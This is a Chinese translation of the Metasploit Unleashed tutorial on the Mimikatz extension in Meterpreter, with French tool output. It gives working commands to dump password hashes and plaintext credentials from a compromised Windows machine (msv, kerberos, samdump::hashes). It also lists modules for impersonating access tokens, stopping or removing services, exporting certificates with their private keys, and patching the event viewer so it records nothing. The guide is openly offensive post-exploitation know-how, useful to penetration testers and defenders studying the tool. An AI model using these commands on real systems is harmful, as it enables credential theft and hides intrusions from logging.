原文:http://www.offensive-security.com/metasploit-unleashed/Mimikatz

翻译:http://drops.wooyun.org/tips/2443


确保在system权限下执行mimikatz


通过尝试加载一个不存在的特性来得到可用模块的完整列表

meterpreter > mimikatz_command -f fu::
Module : 'fu' introuvable
 
Modules disponibles : 
                - Standard
      crypto    - Cryptographie et certificats
        hash    - Hash
      system    - Gestion système
     process    - Manipulation des processus
      thread    - Manipulation des threads
     service    - Manipulation des services
   privilege    - Manipulation des privilèges
      handle    - Manipulation des handles
 impersonate    - Manipulation tokens d'accès
     winmine    - Manipulation du démineur
 minesweeper    - Manipulation du démineur 7
       nogpo    - Anti-gpo et patchs divers
     samdump    - Dump de SAM
      inject    - Injecteur de librairies
          ts    - Terminal Server
      divers    - Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
    sekurlsa    - Dump des sessions courantes par providers LSASS
         efs    - Manipulations EFS


使用如下的语法来请求某个模块可用的选项:

meterpreter > mimikatz_command -f divers::
Module : 'divers' identifié, mais commande '' introuvable
 
Description du module : Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
  noroutemon    - [experimental] Patch Juniper Network Connect pour ne plus superviser la table de routage
   eventdrop    - [super experimental] Patch l'observateur d'événements pour ne plus rien enregistrer
  cancelator    - Patch le bouton annuler de Windows XP et 2003 en console pour déverrouiller une session
     secrets    - Affiche les secrets utilisateur


导出hash和明文证书:

方式一:msv

方式二:kerberos

方式三:mimikatz_command -f samdump::hashes


Handle模块可以用来list/kill进程以及模拟用户令牌:

mimikatz_command -f handle::


Service模块让你可以list/start/stop以及remove windows服务:

mimikatz_command -f service::


Crypto模块允许你list、export任何证书,以及储存在目标机器上相应的私钥:

mimikatz_command -f crypto::


扫雷:

mimikatz_command -f winmine::infos